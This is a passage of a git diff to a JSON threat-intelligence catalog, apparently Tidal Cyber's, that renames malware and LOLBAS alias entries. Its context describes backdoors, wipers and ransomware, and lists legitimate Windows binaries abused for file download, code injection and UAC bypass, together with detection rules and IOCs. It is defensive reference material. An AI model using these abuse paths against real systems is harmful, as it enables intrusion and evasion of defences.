maintaining a permanent backdoor [[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)].", @@ -15056,7 +15056,7 @@ } ], "uuid": "a649459f-dd6d-424f-87c4-aeb8412ca6f6", - "value": "KEYPLUG.LINUX" + "value": "KEYPLUG.LINUX - Associated Software" }, { "description": "[KEYPLUG](https://app.tidalcyber.com/software/ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) since at least June 2021.[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", @@ -15125,7 +15125,7 @@ } ], "uuid": "12213e6d-72a5-447e-9e19-2a7eb7e2d81c", - "value": "Win32/KillDisk.NBI" + "value": "Win32/KillDisk.NBI - Associated Software" }, { "description": "", @@ -15139,7 +15139,7 @@ } ], "uuid": "f716a88b-4693-4d43-97b0-c5603202d586", - "value": "Win32/KillDisk.NBH" + "value": "Win32/KillDisk.NBH - Associated Software" }, { "description": "", @@ -15153,7 +15153,7 @@ } ], "uuid": "4b3409dd-72c5-4808-9d11-7806955a7231", - "value": "Win32/KillDisk.NBD" + "value": "Win32/KillDisk.NBD - Associated Software" }, { "description": "", @@ -15167,7 +15167,7 @@ } ], "uuid": "c0b27dd0-0895-4ddb-97da-2d55f2c22ca6", - "value": "Win32/KillDisk.NBC" + "value": "Win32/KillDisk.NBC - Associated Software" }, { "description": "", @@ -15181,7 +15181,7 @@ } ], "uuid": "df0e171c-ed35-4f1d-9ded-a16e58383bd7", - "value": "Win32/KillDisk.NBB" + "value": "Win32/KillDisk.NBB - Associated Software" }, { "description": "[KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) variants.[[KillDisk Ransomware](https://app.tidalcyber.com/references/9d22f13d-af6d-47b5-93ed-5e4b85b94978)][[ESEST Black Energy Jan 2016](https://app.tidalcyber.com/references/4d626eb9-3722-4aa4-b95e-1650cc2865c2)][[Trend Micro KillDisk 1](https://app.tidalcyber.com/references/8ae31db0-2744-4366-9747-55fc4679dbf5)][[Trend Micro KillDisk 2](https://app.tidalcyber.com/references/62d9a4c9-e669-4dd4-a584-4f3e3e54f97f)]", @@ -15509,7 +15509,7 @@ } ], "uuid": "b7501271-0611-44a6-b8ee-844345798754", - "value": "Launch-VsDevShell.ps1" + "value": "Launch-VsDevShell.ps1 - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet\n\n**Author:** Nasreddine Bencherchali\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1\n\n**Resources:**\n* [https://twitter.com/nas_bench/status/1535981653239255040](https://twitter.com/nas_bench/status/1535981653239255040)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_launch_vsdevshell.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml)[[Launch-VsDevShell.ps1 - LOLBAS Project](/references/6e81ff6a-a386-495e-bd4b-cf698b02bce8)]", @@ -15635,7 +15635,7 @@ } ], "uuid": "6c55efe5-a5d3-411d-8993-697f2fc91144", - "value": "Ldifde.exe" + "value": "Ldifde.exe - Associated Software" }, { "description": "Ldifde is a Windows command-line tool that is used to create, modify, and delete directory objects. Ldifde can also be used to \"extend the schema, export Active Directory user and group information to other applications or services, and populate Active Directory Domain Services (AD DS) with data from other directory services\".[[Ldifde Microsoft](/references/c47ed0e0-f3e3-41de-9ea7-64fe4e343d9d)]", @@ -15714,7 +15714,7 @@ } ], "uuid": "d24d63ab-a1b5-4e20-9e60-f2df8fba9cb7", - "value": "Level.io" + "value": "Level.io - Associated Software" }, { "description": "[[Mandiant UNC3944 September 14 2023](/references/7420d79f-c6a3-4932-9c2e-c9cc36e2ca35)]", @@ -15730,7 +15730,7 @@ } ], "uuid": "de43630e-5949-4c69-ab58-9e3d44a72386", - "value": "Level Remote Management" + "value": "Level Remote Management - Associated Software" }, { "description": "According to joint Cybersecurity Advisory AA23-320A (November 2023), Level is a publicly available, legitimate tool that \"enables remote monitoring and management of systems\". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", @@ -15943,7 +15943,7 @@ } ], "uuid": "1eb0bda6-e564-43eb-b440-8da9ffd39909", - "value": "Tirion" + "value": "Tirion - Associated Software" }, { "description": "[Lizar](https://app.tidalcyber.com/software/65d46aab-b3ce-4f5b-b1fc-871db2573fa1) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d). It has likely been used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) since at least February 2021.[[BiZone Lizar May 2021](https://app.tidalcyber.com/references/315f47e1-69e5-4dcb-94b2-59583e91dd26)][[Threatpost Lizar May 2021](https://app.tidalcyber.com/references/1b89f62f-586d-4dee-b6dd-e5a5cd090a0e)][[Gemini FIN7 Oct 2021](https://app.tidalcyber.com/references/bbaef178-8577-4398-8e28-604faf0950b4)]", @@ -15998,7 +15998,7 @@ } ], "uuid": "37c1fbc5-58d9-48f5-a06f-887a9d404a18", - "value": "LockBit Black" + "value": "LockBit Black - Associated Software" }, { "description": "Ransomware labeled “LockBit” was first observed in 2020, and since that time, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]\n\nLockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (“CISA”), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (September 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] According to CISA, LockBit 3.0 (also known as “LockBit Black”) shares code similarities with Blackmatter and BlackCat ransomware and is “more modular and evasive\" than previous LockBit strains.[[U.S. CISA LockBit 3.0 March 2023](/references/06de9247-ce40-4709-a17a-a65b8853758b)]\n\nAccording to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims (all associated with LockBit 3.0), more than double the number of the next threat (Clop, with 179 victims).[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]\n\n**Delivered By**: Cobalt Strike[[Sentinel Labs LockBit 3.0 July 2022](/references/9a73b140-b483-4274-a134-ed1bb15ac31c)], PsExec[[NCC Group Research Blog August 19 2022](/references/8c1fbe98-5fc1-4e67-9b96-b740ffc9b1ae)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/lockbit/\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/LockBit", @@ -16082,7 +16082,7 @@ } ], "uuid": "79b93082-8ee8-49c9-a5c4-4cf5309a6a5c", - "value": "Rescue" + "value": "Rescue - Associated Software" }, { "description": "LogMeIn provides multiple freely available tools that can be used for remote access to systems, including the flagship Rescue tool.[[LogMeIn Homepage](/references/e113b544-82ad-4099-ab4e-7fc8b78f54bd)] Adversary groups, including the Royal ransomware operation and LAPSUS$, have used LogMeIn remote access software for initial access to and persistence within victim networks.[[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)][[CSRB LAPSUS$ July 24 2023](/references/f8311977-303c-4d05-a7f4-25b3ae36318b)]", @@ -16340,7 +16340,7 @@ } ], "uuid": "4905b225-105e-4aec-af6e-16466cc7b717", - "value": "Enfal" + "value": "Enfal - Associated Software" }, { "description": "[Lurid](https://app.tidalcyber.com/software/0cc9e24b-d458-4782-a332-4e4fd68c057b) is a malware family that has been used by several groups, including [PittyTiger](https://app.tidalcyber.com/groups/60936d3c-37ed-4116-a407-868da3aa4446), in targeted attacks as far back as 2006. [[Villeneuve 2014](https://app.tidalcyber.com/references/a156e24e-0da5-4ac7-b914-29f2f05e7d6f)] [[Villeneuve 2011](https://app.tidalcyber.com/references/ed5a2ec0-8328-40db-9f58-7eaac4ad39a0)]", @@ -16383,7 +16383,7 @@ } ], "uuid": "a4493a61-fd76-4668-83e3-f708beb2c553", - "value": "Pyark" + "value": "Pyark - Associated Software" }, { "description": "[Machete](https://app.tidalcyber.com/software/be8a1630-9562-41ad-a621-65989f961a10) is a cyber espionage toolset used by [Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.[[ESET Machete July 2019](https://app.tidalcyber.com/references/408d5e33-fcb6-4d21-8be9-7aa5a8bd3385)][[Securelist Machete Aug 2014](https://app.tidalcyber.com/references/fc7be240-bd15-4ec4-bc01-f8891d7210d9)][[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]", @@ -16426,7 +16426,7 @@ } ], "uuid": "09e6536d-b970-43ae-a1ac-cea3a523635c", - "value": "DazzleSpy" + "value": "DazzleSpy - Associated Software" }, { "description": "[[Objective-See MacMa Nov 2021](https://app.tidalcyber.com/references/7240261e-d901-4a68-b6fc-deec308e8a50)]", @@ -16440,7 +16440,7 @@ } ], "uuid": "246b0d77-743e-413a-8e7a-76a5a4b391de", - "value": "OSX.CDDS" + "value": "OSX.CDDS - Associated Software" }, { "description": "[MacMa](https://app.tidalcyber.com/software/7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://app.tidalcyber.com/software/7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb) has been observed in the wild since November 2021.[[ESET DazzleSpy Jan 2022](https://app.tidalcyber.com/references/212012ac-9084-490f-8dd2-5cc9ac6e6de1)]", @@ -16579,7 +16579,7 @@ } ], "uuid": "be6d153d-2288-4519-bade-cca6c8ae2aa8", - "value": "Makecab.exe" + "value": "Makecab.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary to package existing files into a cabinet (.cab) file\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\makecab.exe\n* C:\\Windows\\SysWOW64\\makecab.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_alternate_data_streams.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml)\n* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)\n* IOC: Makecab retrieving files from Internet\n* IOC: Makecab storing data into alternate data streams[[Makecab.exe - LOLBAS Project](/references/6473e36b-b5ad-4254-b46d-38c53ccbe446)]", @@ -16635,7 +16635,7 @@ } ], "uuid": "8c479a90-537a-4661-ba2a-7e9e7ca5d04a", - "value": "Manage-bde.wsf" + "value": "Manage-bde.wsf - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Script for managing BitLocker\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\manage-bde.wsf\n\n**Resources:**\n* [https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712](https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712)\n* [https://twitter.com/bohops/status/980659399495741441](https://twitter.com/bohops/status/980659399495741441)\n* [https://twitter.com/JohnLaTwC/status/1223292479270600706](https://twitter.com/JohnLaTwC/status/1223292479270600706)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_manage_bde.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml)\n* IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations[[Manage-bde.wsf - LOLBAS Project](/references/74d5483e-2268-464c-a048-bb1f25bbfc4f)]", @@ -16731,7 +16731,7 @@ } ], "uuid": "e74db115-407d-44dd-906e-2163f2a50e29", - "value": "Mavinject.exe" + "value": "Mavinject.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by App-v in Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\mavinject.exe\n* C:\\Windows\\SysWOW64\\mavinject.exe\n\n**Resources:**\n* [https://twitter.com/gN3mes1s/status/941315826107510784](https://twitter.com/gN3mes1s/status/941315826107510784)\n* [https://twitter.com/Hexcorn/status/776122138063409152](https://twitter.com/Hexcorn/status/776122138063409152)\n* [https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_mavinject_process_injection.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml)\n* IOC: mavinject.exe should not run unless APP-v is in use on the workstation[[LOLBAS Mavinject](/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]", @@ -17055,7 +17055,7 @@ } ], "uuid": "10ba04c6-5c6e-4b8e-b855-3d02ce26808b", - "value": "Casbaneiro" + "value": "Casbaneiro - Associated Software" }, { "description": "[Metamorfo](https://app.tidalcyber.com/software/ca607087-25ad-4a91-af83-608646cccbcb) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.[[Medium Metamorfo Apr 2020](https://app.tidalcyber.com/references/356defac-b976-41c1-aac8-5d6ff0c80e28)][[ESET Casbaneiro Oct 2019](https://app.tidalcyber.com/references/a5cb3ee6-9a0b-4e90-bf32-be7177a858b1)] ", @@ -17149,7 +17149,7 @@ } ], "uuid": "d9cc6ddb-3c47-45f9-8caf-8124ca55945f", - "value": "Mftrace.exe" + "value": "Mftrace.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Trace log generation tool for Media Foundation Tools.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\n\n**Resources:**\n* [https://twitter.com/0rbz_/status/988911181422186496](https://twitter.com/0rbz_/status/988911181422186496)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_mftrace.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml)[[Mftrace.exe - LOLBAS Project](/references/b6d42cc9-1bf0-4389-8654-90b8d4e7ff49)]", @@ -17215,7 +17215,7 @@ } ], "uuid": "9ddd8ae4-93ff-41ce-b8f2-ac035a25411f", - "value": "Microsoft.NodejsTools.PressAnyKey.exe" + "value": "Microsoft.NodejsTools.PressAnyKey.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Part of the NodeJS Visual Studio tools.\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1463526834918854661](https://twitter.com/mrd0x/status/1463526834918854661)\n\n**Detection:**\n* Sigma: [proc_creation_win_renamed_pressanykey.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml)\n* Sigma: [proc_creation_win_pressanykey_lolbin_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml)[[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project](/references/25c46948-a648-4c3c-b442-e700df68fa20)]", @@ -17258,7 +17258,7 @@ } ], "uuid": "26fae087-2715-4a16-8583-ffe1e0040044", - "value": "Microsoft.Workflow.Compiler.exe" + "value": "Microsoft.Workflow.Compiler.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** A utility included with .NET that is capable of compiling and executing C# or VB.net code.\n\n**Author:** Conor Richard\n\n**Paths:**\n* C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe\n\n**Resources:**\n* [https://twitter.com/mattifestation/status/1030445200475185154](https://twitter.com/mattifestation/status/1030445200475185154)\n* [https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb](https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb)\n* [https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1](https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1)\n* [https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1](https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1)\n* [https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks](https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks)\n* [https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/](https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/)\n* [https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15](https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_workflow_compiler.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml)\n* Splunk: [suspicious_microsoft_workflow_compiler_usage.yml](https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml)\n* Splunk: [suspicious_microsoft_workflow_compiler_rename.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.\n* IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe\n* IOC: Presence of \"[[Microsoft.Workflow.Compiler.exe - LOLBAS Project](/references/1e659b32-a06f-45dc-a1eb-03f1a42c55ef)]
", @@ -17299,7 +17299,7 @@ } ], "uuid": "e94603e8-5352-4ef9-9970-e2ac9ede79b4", - "value": "James" + "value": "James - Associated Software" }, { "description": "[Milan](https://app.tidalcyber.com/software/57545dbc-c72a-409d-a373-bc35e25160cd) is a backdoor implant based on [DanBot](https://app.tidalcyber.com/software/131c0eb2-9191-4ccd-a2d6-5f36046a8f2f) that was written in Visual C++ and .NET. [Milan](https://app.tidalcyber.com/software/57545dbc-c72a-409d-a373-bc35e25160cd) has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least June 2020.[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)][[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)]", @@ -17755,7 +17755,7 @@ } ], "uuid": "08c13774-647c-472d-8e6e-d1fb2f21e67d", - "value": "Mmc.exe" + "value": "Mmc.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Load snap-ins to locally and remotely manage Windows systems\n\n**Author:** @bohops\n\n**Paths:**\n* C:\\Windows\\System32\\mmc.exe\n* C:\\Windows\\SysWOW64\\mmc.exe\n\n**Resources:**\n* [https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/](https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/)\n* [https://offsec.almond.consulting/UAC-bypass-dotnet.html](https://offsec.almond.consulting/UAC-bypass-dotnet.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_mmc_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml)\n* Sigma: [file_event_win_uac_bypass_dotnet_profiler.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml)[[Mmc.exe - LOLBAS Project](/references/490b6769-e386-4a3d-972e-5a919cb2f6f5)]", @@ -17895,7 +17895,7 @@ } ], "uuid": "d2877108-0856-4969-8eb5-421cd2d7acf8", - "value": "SKID" + "value": "SKID - Associated Software" }, { "description": "[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)][[Visa FIN6 Feb 2019](https://app.tidalcyber.com/references/9e9e8811-1d8e-4400-8688-e634f859c4e0)]", @@ -17909,7 +17909,7 @@ } ], "uuid": "8e995f3c-8e8d-4f7e-b91c-9c9d02ae1448", - "value": "Terra Loader" + "value": "Terra Loader - Associated Software" }, { "description": "[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]", @@ -17923,7 +17923,7 @@ } ], "uuid": "96f03902-3d1b-49cf-a0df-8add8434f012", - "value": "SpicyOmelette" + "value": "SpicyOmelette - Associated Software" }, { "description": "[More_eggs](https://app.tidalcyber.com/software/69f202e7-4bc9-4f4f-943f-330c053ae977) is a JScript backdoor used by [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c). Its name was given based on the variable \"More_eggs\" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. [[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)][[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]", @@ -18040,7 +18040,7 @@ } ], "uuid": "78bdf160-7b3c-4832-a3fc-1caa419309c7", - "value": "MpCmdRun.exe" + "value": "MpCmdRun.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary part of Windows Defender. Used to manage settings in Windows Defender\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe\n* C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe\n* C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus](https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus)\n* [https://twitter.com/mohammadaskar2/status/1301263551638761477](https://twitter.com/mohammadaskar2/status/1301263551638761477)\n* [https://twitter.com/Oddvarmoe/status/1301444858910052352](https://twitter.com/Oddvarmoe/status/1301444858910052352)\n* [https://twitter.com/NotMedic/status/1301506813242867720](https://twitter.com/NotMedic/status/1301506813242867720)\n\n**Detection:**\n* Sigma: [win_susp_mpcmdrun_download.yml](https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml)\n* Elastic: [command_and_control_remote_file_copy_mpcmdrun.toml](https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml)\n* IOC: MpCmdRun storing data into alternate data streams.\n* IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected.\n* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.\n* IOC: Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log\n* IOC: User Agent is \"MpCommunication\"[[MpCmdRun.exe - LOLBAS Project](/references/2082d5ca-474f-4130-b275-c1ac5e30064c)]", @@ -18082,7 +18082,7 